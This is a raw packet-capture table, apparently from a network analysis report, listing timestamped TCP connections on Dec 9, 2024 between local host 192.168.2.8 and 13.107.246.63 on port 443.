                                                                                                        Dec 9, 2024 13:50:22.795599937 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.795644045 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.795747042 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.795883894 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.795896053 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.834429026 CET4434983713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.837574959 CET4434983713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.837688923 CET49837443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.838628054 CET49837443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.838644981 CET4434983713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.838654995 CET49837443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.838660002 CET4434983713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.841233015 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.841269016 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.841342926 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.841975927 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.841986895 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.882345915 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.882400990 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.887572050 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.887579918 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.887847900 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:22.888994932 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:22.935323954 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.132447004 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.132508993 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.135375977 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.135477066 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.135478973 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.135484934 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.135701895 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.136374950 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.137387991 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.137394905 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.137633085 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.138184071 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.179323912 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.179323912 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.315613985 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.318839073 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.318898916 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.318928003 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.318964005 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.320039988 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.320055962 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.320067883 CET49838443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.320072889 CET4434983813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.330193996 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.330223083 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.330287933 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.332895041 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.332906008 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.564805984 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.568236113 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.568305016 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.568459034 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.568459034 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.570910931 CET49839443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.570929050 CET4434983913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.571568966 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.571762085 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.571790934 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.571849108 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.571943045 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.572156906 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.572156906 CET49840443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.572175980 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.572189093 CET4434984013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.573525906 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.573539972 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.578325033 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.578362942 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:23.578733921 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.581720114 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:23.581737041 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.512192965 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.512741089 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.512763977 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.513372898 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.513381004 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.668962955 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.669550896 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.669569016 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.670243025 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.670248032 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.945126057 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.948626041 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.948719025 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.948843956 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.948865891 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.948879004 CET49841443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.948885918 CET4434984113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.951841116 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.951883078 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:24.951981068 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.952097893 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:24.952111959 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.051184893 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.051604986 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.051621914 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.052037954 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.052050114 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.111466885 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.123358011 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.123413086 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.123419046 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.123465061 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.123522997 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.123547077 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.123558998 CET49842443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.123564959 CET4434984213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.127021074 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.127059937 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.127137899 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.127362967 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.127368927 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.286725044 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.287373066 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.287399054 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.288074970 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.288081884 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.302871943 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.304752111 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.304780006 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.305175066 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.305181026 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.484065056 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.487581015 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.487812042 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.487812042 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.487812042 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.490479946 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.490504026 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.492945910 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.493078947 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.493092060 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.720783949 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.724061012 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.724153042 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.724199057 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.724219084 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.724240065 CET49844443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.724246025 CET4434984413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.727021933 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.727061987 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.727200985 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.727335930 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.727345943 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.736249924 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.739691019 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.739866018 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.739866972 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.739907026 CET49845443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.739919901 CET4434984513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.742523909 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.742568016 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.742691994 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.742795944 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.742810965 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:25.790632963 CET49843443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:25.790656090 CET4434984313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.666240931 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.669660091 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:26.669692993 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.670144081 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:26.670149088 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.857209921 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.857613087 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:26.857630968 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:26.858026028 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:26.858031034 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.100512028 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.103590965 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.103641987 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.103697062 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.103723049 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.103739023 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.103749037 CET49846443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.103755951 CET4434984613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.106986046 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.107016087 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.107079983 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.107239008 CET49851443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.107254982 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.207096100 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.211393118 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.211411953 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.211869001 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.211874008 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.290962934 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.294126034 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.294974089 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.295644045 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.295665979 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.295679092 CET49847443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.295686007 CET4434984713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.298448086 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.298496962 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.298562050 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.298819065 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.298831940 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.444469929 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.445359945 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.445389986 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.445930004 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.445943117 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.460413933 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.461263895 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.461287975 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.461668015 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.461675882 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.642832994 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.646312952 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.648951054 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.649020910 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.649039984 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.649050951 CET49848443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.649056911 CET4434984813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.651448965 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.651496887 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.651563883 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.651684999 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.651695013 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.877655983 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.881706953 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.882155895 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.882211924 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.882231951 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.882242918 CET49849443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.882249117 CET4434984913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.884824038 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.884874105 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.884970903 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.885145903 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.885165930 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.902914047 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.906601906 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.906644106 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.906697989 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.906728983 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.906744003 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.906754017 CET49850443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.906759977 CET4434985013.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.908940077 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.908962011 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:27.909020901 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.909145117 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:27.909156084 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.015429974 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.020611048 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.020646095 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.021076918 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.021087885 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.367726088 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.370332956 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.370361090 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.370778084 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.370790005 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.448627949 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.452151060 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.452203035 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.452204943 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.452250957 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.456171036 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.456193924 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.456226110 CET49852443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.456232071 CET4434985213.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.471417904 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.471468925 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.471534967 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.472594023 CET49856443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.472605944 CET4434985613.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.607301950 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.610543013 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.610568047 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.611001015 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.611006021 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.622615099 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.622910976 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.622936010 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.623281002 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.623286963 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.800637960 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.804531097 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.804596901 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.806885958 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.806904078 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.806936026 CET49853443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.806941986 CET4434985313.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.809665918 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.809705973 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:29.809777021 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.809892893 CET49857443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:29.809900999 CET4434985713.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.040117979 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.044142962 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.044198990 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.044204950 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.044249058 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.051156044 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.051179886 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.051191092 CET49854443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.051198006 CET4434985413.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.058662891 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.060894012 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.060947895 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.061000109 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.061706066 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.061754942 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.072061062 CET49858443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.072093964 CET4434985813.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.072331905 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.072350979 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.072361946 CET49855443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.072367907 CET4434985513.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.074827909 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.074866056 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.074919939 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.081585884 CET49859443192.168.2.813.107.246.63
                                                                                                        Dec 9, 2024 13:50:30.081598997 CET4434985913.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.090692043 CET4434985113.107.246.63192.168.2.8
                                                                                                        Dec 9, 2024 13:50:30.091027021 CET49851443192.168.2.813.107.246.63
